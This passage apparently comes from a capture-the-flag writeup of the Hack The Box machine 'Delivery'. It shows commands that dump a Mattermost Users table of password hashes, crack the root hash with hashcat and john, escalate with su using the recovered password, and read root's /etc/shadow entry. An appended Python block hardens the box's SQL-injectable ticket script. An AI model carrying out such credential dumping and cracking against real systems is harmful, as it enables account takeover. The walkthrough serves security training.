2 rows in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/026570c317744eb99e21f1a453e5dd13" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Select the MatterMost database:</span></span><div id="https://www.notion.so/009c1a8da2e945599d7e1b19cb390d5a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> use mattermost;</code></span></span></p></div><pre id="https://www.notion.so/6bd412685a3740f487283fb58655f524" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Database changed</span></span></span></code></pre></li><li id="https://www.notion.so/a4887d2da8224aafa772e1995a30be9d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">List all tables within the MatterMost database:</span></span><div id="https://www.notion.so/07acc0af4d8c44e1ab5855ab3a1c9e14" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> show tables;</code></span></span></p></div><pre id="https://www.notion.so/bd0f99c0f8bb4f33afabc56457074bde" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+------------------------+
| Tables_in_mattermost |
+------------------------+
| ... |
| Tokens |
| UserAccessTokens |
| UserGroups |
| Users |
+------------------------+
46 rows in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/35447c566f5d449db4017a802a0311d7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The table of interest is "Users", as password hashes are stored there:</span></span><div id="https://www.notion.so/6da05575015e4c79b9cc5fd3aa81890e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> select * from Users;</code></span></span></p></div><pre id="https://www.notion.so/be0e9a1a3cc7412ea5df26db947e1c4f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+
| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+
| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | [email protected] | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| jyb6rhmzyjbt9bjm5ioyddrcph | 1611061688514 | 1611061999208 | 0 | samiko | $2a$10$/COTMMxieAd/HLdic8eb4uW4YGdJ7wHqn0ZJMtiM4ogCo8Mv62giO | NULL | | [email protected] | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1611061688514 | 0 | 0 | en | {"automaticTimezone":"Australia/Adelaide","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | [email protected] | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+</span></span></span></code></pre></li><li id="https://www.notion.so/47b9642481e64dc89fda71f744f2f7ff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's refine our search:</span></span><div id="https://www.notion.so/6556a03c55b044a68db61d9c48d5f9a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> select Password from Users where Username = 'root';</code></span></span></p></div><pre id="https://www.notion.so/b9dd2fde6002441f894c3ee689db8906" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+--------------------------------------------------------------+
| Password |
+--------------------------------------------------------------+
| $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+--------------------------------------------------------------+
1 row in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/4c967fe9934843758a71c5bf942a61e8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found root hash:</span></span><div id="https://www.notion.so/2d8e07c7a66c4429b70f2f7a42f729cd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO</code></span></span></p></div></li><li id="https://www.notion.so/ba36462d9a4145388dd7fcbd993dbdae" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Cracking the hash with hashcat and john:</span></span><div id="https://www.notion.so/598c639939f748a7b8f27836e2477b46" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo 'PleaseSubscribe!' 
| hashcat -r ../Common/OneRuleToRuleThemAll.rule --stdout > hash.out</code></span></span></p></div><div id="https://www.notion.so/51d8dba4e4d6437cad3003f1e917cb81" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ john -w=hash.out hash</code></span></span></p></div></li><li id="https://www.notion.so/09c80168a4a24065be1eac53b4f8da43" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root credentials:</span></span><div id="https://www.notion.so/27f373d9b9bf4473bdb1c5bcde0c35aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root:PleaseSubscribe!21</code></span></span></p></div></li><li id="https://www.notion.so/241aba5f9009484c9f8c361d0ee4a5ce" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Elevate privileges:</span></span><div id="https://www.notion.so/d3530076d3224c348829664805494df1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><div id="https://www.notion.so/686dc1a8c1d048068d5ff3fb58365124" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PleaseSubscribe!21</code></span></span></p></div></li><li id="https://www.notion.so/7c4e438f52a1438bb1028e596910efe3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 
id="https://www.notion.so/0c8f06b6efc848c8a2d791f9c39d7bcc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0c8f06b6efc848c8a2d791f9c39d7bcc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/d1a4984bcd6d4761a0f2453080700cf1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found a cool note in the root directory from the box maker, ippsec himself:</span></span><pre id="https://www.notion.so/9df994595e0d4fb6bdb6f5304ef2f689" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I've seen several times. The inspiration for the box is here:
- </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c"><span>https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c</span></a></span><span class="SemanticString"><span>
Keep on hacking! And please don't forget to subscribe to all the security streamers out there.
- ippsec</span></span></span></code></pre></li><li id="https://www.notion.so/16731d8a299c47538d90ff418f020ccb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> regex check in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root/py-smtp.py</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/37474c27025b4252978a88db0414d9ef" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">if</span> re<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">r'^[0-9]*@delivery.htb$'</span><span class="token punctuation">,</span> rcpttos<span class="token punctuation">)</span><span class="token punctuation">:</span>
ticket <span class="token operator">=</span> rcpttos<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'@'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
db <span class="token operator">=</span> pymysql<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token string">"localhost"</span><span class="token punctuation">,</span><span class="token string">"ost_user"</span><span class="token punctuation">,</span><span class="token string">"!H3lpD3sk123!"</span><span class="token punctuation">,</span> <span class="token string">"osticket"</span> <span class="token punctuation">)</span>
cursor <span class="token operator">=</span> db<span class="token punctuation">.</span>cursor<span class="token punctuation">(</span><span class="token punctuation">)</span>
cursor<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"SELECT ticket_id from ost_ticket where number = '</span><span class="token interpolation"><span class="token punctuation">{</span>ticket<span class="token punctuation">}</span></span><span class="token string">'"</span></span><span class="token punctuation">)</span>
result <span class="token operator">=</span> cursor<span class="token punctuation">.</span>fetchone<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
<span class="token keyword">if</span> result<span class="token punctuation">:</span>
cursor<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"UPDATE ost_thread_entry SET body = '</span><span class="token interpolation"><span class="token punctuation">{</span>data<span class="token punctuation">}</span></span><span class="token string">' WHERE thread_id = '</span><span class="token interpolation"><span class="token punctuation">{</span>result<span class="token punctuation">}</span></span><span class="token string">'"</span></span><span class="token punctuation">)</span>
db<span class="token punctuation">.</span>commit<span class="token punctuation">(</span><span class="token punctuation">)</span>
db<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/2fc684d256274723b5a1e4d8bcafe2b5" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2fc684d256274723b5a1e4d8bcafe2b5"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9b76103a9b0f4e4faedf754b89779d55" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get the root user hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/f2a439a940e549668ba58bbd35eadd5e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root:$6$Zgefgue1ExBT80dl$uTb2.giC3XGWRl55oIq94jD50ylT5ZfE9eghl.YP92co.M.gJB5jPGNlbgGQSczIibtyn.jZtOyIseVvXrM2V0:18624:0:99999:7:::</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/eb334614ebce4e728068601c3d6bba48" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/eb334614ebce4e728068601c3d6bba48"><svg width="16" height="16" viewBox="0 0 16 
16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/0229b180525c477a8138738f9ba3633e" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/NotSoSecure/password_cracking_rules">https://github.com/NotSoSecure/password_cracking_rules</a></span></span></li><li id="https://www.notion.so/c94391b1a59c474abc168ce32f3df7d1" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c">https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c</a></span></span></li></ol></article>
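The /root/py-smtp.py snippet quoted in the Post-exploitation section builds its SQL with f-strings from SMTP-controlled data and matches the recipient with an unescaped dot. The block below is an added example, not code from the box or from this writeup, showing the same ticket-update logic written defensively; it assumes an in-memory sqlite3 database standing in for the box's MariaDB/pymysql connection and a constructed ticket number.

```python
"""Hardened rewrite of the ticket-update logic seen in /root/py-smtp.py.

Added example, not the box's own code. Same behaviour (find an osTicket
ticket by number, store the mail body in its thread entry) but fixes
three defects visible in the original:

1. r'^[0-9]*@delivery.htb$' has an unescaped '.', so '12@deliveryXhtb'
   matches too, and [0-9]* accepts an empty ticket number.
2. Ticket number and mail body are interpolated into SQL text; both
   arrive from the SMTP client.
3. cursor.fetchone()[0] raises TypeError when no ticket matches.

sqlite3 stands in for pymysql so this runs offline; only the parameter
placeholder differs (? here, %s with pymysql).
"""
import re
import sqlite3

# Anchored, dot escaped, at least one digit.
RCPT_RE = re.compile(r"^[0-9]+@delivery\.htb$")


def ticket_number_from_rcpt(rcpt: str):
    """Return the ticket number if rcpt is a valid ticket address, else None."""
    return rcpt.split("@")[0] if RCPT_RE.fullmatch(rcpt) else None


def store_reply(db, rcpt: str, body: str) -> bool:
    """Store the mail body on the matching ticket; True only on success.

    Both values travel as bound parameters, never inside the query text,
    so a body such as "x' OR '1'='1" is stored literally.
    """
    number = ticket_number_from_rcpt(rcpt)
    if number is None:
        return False
    cur = db.cursor()
    cur.execute("SELECT ticket_id FROM ost_ticket WHERE number = ?", (number,))
    row = cur.fetchone()
    if row is None:  # the original would raise TypeError here
        return False
    cur.execute(
        "UPDATE ost_thread_entry SET body = ? WHERE thread_id = ?",
        (body, row[0]),
    )
    db.commit()
    return cur.rowcount == 1


def demo_db():
    """In-memory schema with one constructed ticket (number 8103145)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE ost_ticket (ticket_id INTEGER, number TEXT);"
        "CREATE TABLE ost_thread_entry (thread_id INTEGER, body TEXT);"
        "INSERT INTO ost_ticket VALUES (7, '8103145');"
        "INSERT INTO ost_thread_entry VALUES (7, '');"
    )
    return db


def thread_body(db, thread_id: int) -> str:
    """Read back the stored body for a thread (helper for checking results)."""
    return db.execute("SELECT body FROM ost_thread_entry WHERE thread_id = ?",
                      (thread_id,)).fetchone()[0]
```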
<footer class="Footer">
<div>[email protected]~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>